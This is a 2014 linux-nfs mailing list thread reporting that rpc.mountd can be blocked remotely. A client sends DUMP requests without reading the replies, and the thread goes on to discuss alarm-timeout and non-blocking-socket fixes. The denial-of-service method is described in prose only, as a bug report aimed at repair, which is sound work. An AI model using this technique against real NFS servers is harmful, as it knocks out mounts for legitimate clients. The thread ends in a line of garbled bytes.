rpc.mountd can be blocked by a bad client

Discussion:

Strösser, Bodo

2014-09-24 10:57:09 UTC

Hello,

a few days ago we had some trouble with a NFS server. The clients most of the time no longer
could mount any shares, but in rare cases they had success.

We found out, that during the times when mounts failed, rpc.mountd hung on a write() to a TCP
socket. netstat showed, that Send-Q was full and Recv-Q counted up slowly. After a long time
the write ended with an error ("TCP timeout" IIRC) and rpc.mountd worked normally for a short
while until it again hung on write() for the same reason. The problem was caused by a MTU size
configured wrong. So, one single bad client (or as much clients as the number of threads used
by rpc.mountd) can block rpc.mountd entirely.

But what will happen, if someone intentionally sends RPC requests, but doesn't read() the
answers? I wrote a small tool to test this situation. It fires DUMP requests to rpc.mountd as
fast as possible, but does not read from the socket. The result is the same as with the
problem above: rpc.mountd hangs in write() and no longer responds to other requests while no
TCP timeout breaks up this situation.

So it's quite easy to intentionally block rpc.mountd from remote.

Please CC me, I'm not on the list.

Best regards,
Bodo
--
To unsubscribe from this list: send the line "unsubscribe linux-nfs" in
the body of a message to majordomo-***@public.gmane.org
More majordomo info at http://vger.kernel.org/majordomo-info.html

NeilBrown

2014-09-25 00:32:10 UTC

Permalink

On Wed, 24 Sep 2014 12:57:09 +0200 "StrÃ¶sser, Bodo"

Post by StrÃ¶sser, Bodo
Hello,
a few days ago we had some trouble with a NFS server. The clients most of the time no longer
could mount any shares, but in rare cases they had success.
We found out, that during the times when mounts failed, rpc.mountd hung on a write() to a TCP
socket. netstat showed, that Send-Q was full and Recv-Q counted up slowly. After a long time
the write ended with an error ("TCP timeout" IIRC) and rpc.mountd worked normally for a short
while until it again hung on write() for the same reason. The problem was caused by a MTU size
configured wrong. So, one single bad client (or as much clients as the number of threads used
by rpc.mountd) can block rpc.mountd entirely.
But what will happen, if someone intentionally sends RPC requests, but doesn't read() the
answers? I wrote a small tool to test this situation. It fires DUMP requests to rpc.mountd as
fast as possible, but does not read from the socket. The result is the same as with the
problem above: rpc.mountd hangs in write() and no longer responds to other requests while no
TCP timeout breaks up this situation.
So it's quite easy to intentionally block rpc.mountd from remote.

That's rather nasty.
We could possibly set the socket to be non-blocking, or we could set an alarm
just before handling a request.
Probably rpc_dispatch() in support/nfs/rpcdispatch.c would be the best place
to put the timeout.
catch SIGALRM (don't set SA_RESTART)
alarm(10);
call svc_sendreply
alarm(0);

if the alarm fires while svc_sendreply is writing to the socket it should get
an error and close the connection.

This would only fix mountd (as it is the only process to use rpc_dispatch).
Is a similar thing needed for statd I wonder?? It isn't so important.

NeilBrown

Post by StrÃ¶sser, Bodo
Please CC me, I'm not on the list.
Best regards,
Bodo
--
To unsubscribe from this list: send the line "unsubscribe linux-nfs" in
More majordomo info at http://vger.kernel.org/majordomo-info.html

Strösser, Bodo

2014-09-25 10:21:57 UTC

Permalink

-----Original Message-----
Sent: Thursday, September 25, 2014 2:32 AM
To: Strösser, Bodo
Subject: Re: rpc.mountd can be blocked by a bad client
On Wed, 24 Sep 2014 12:57:09 +0200 "Strösser, Bodo"

Post by StrÃ¶sser, Bodo
Hello,
a few days ago we had some trouble with a NFS server. The clients most of the time no

longer

Post by StrÃ¶sser, Bodo
could mount any shares, but in rare cases they had success.
We found out, that during the times when mounts failed, rpc.mountd hung on a write() to

a TCP

Post by StrÃ¶sser, Bodo
socket. netstat showed, that Send-Q was full and Recv-Q counted up slowly. After a long

time

Post by StrÃ¶sser, Bodo
the write ended with an error ("TCP timeout" IIRC) and rpc.mountd worked normally for a

short

Post by StrÃ¶sser, Bodo
while until it again hung on write() for the same reason. The problem was caused by a

MTU size

Post by StrÃ¶sser, Bodo
configured wrong. So, one single bad client (or as much clients as the number of threads

used

Post by StrÃ¶sser, Bodo
by rpc.mountd) can block rpc.mountd entirely.
But what will happen, if someone intentionally sends RPC requests, but doesn't read()

the

Post by StrÃ¶sser, Bodo
answers? I wrote a small tool to test this situation. It fires DUMP requests to

rpc.mountd as

Post by StrÃ¶sser, Bodo
fast as possible, but does not read from the socket. The result is the same as with the
problem above: rpc.mountd hangs in write() and no longer responds to other requests

while no

Post by StrÃ¶sser, Bodo
TCP timeout breaks up this situation.
So it's quite easy to intentionally block rpc.mountd from remote.

I also thought about changing the socket to non-blocking. But I'm not sure: is it
possible to have such big RPC replies, that they don't fit into the socket
buffer? If so, write() would put the first part into the buffer and a second
write for the rest would fail, as probably the first part isn't acked yet, right?
So, non-blocking needs to be combined with a handling of buffer-full situations,
I guess. Such a handling together with a timeout for starving connections would
be a clean solution.
To do that, one would have to replace the tcp write routine of the rpc library.
That means to change the xdrs's pointer to the write function. I don't know,
whether that can be done in a portable way, which works at the different platforms.

About setting a alarm timeout: I'm not sure, that rpc_dispatch() is the right
place for it. mountd uses mount_dispatch() which has an exit via svcerr_auth(),
that again sends a reply. So the timeout you suggest should be inserted in
mount_dispatch(), I think.
OTOH, a timeout will shorten the hang, but bad clients can still slow down mountd
extremely.

BTW: AFAICS on Linux with libtirpc, using the control SVCGET_CONNMAXREC, the socket
indirectly can set to non-blocking. That seems to result in write_vc() doing a max.
2 second loop of write() until it gives up.

One other point: AFAICS on Linux with libtirpc the listening socket of mountd is
in blocking mode. Would that be a problem when running multiple "threads"?
The comment in svc_socket.c/svc_socket(), where the listening socket is set to
non-blocking, sounds very reasonable. But AFAICS if libtirpc is used, O_NONBLOCK
currently isn't set.

Bodo Stroesser

if the alarm fires while svc_sendreply is writing to the socket it should get
an error and close the connection.
This would only fix mountd (as it is the only process to use rpc_dispatch).
Is a similar thing needed for statd I wonder?? It isn't so important.
NeilBrown

N��r��y��b�X��ǧv�^�)޺{.n�+��{��"��^n�r��z��h��&��v��fp)��br ��+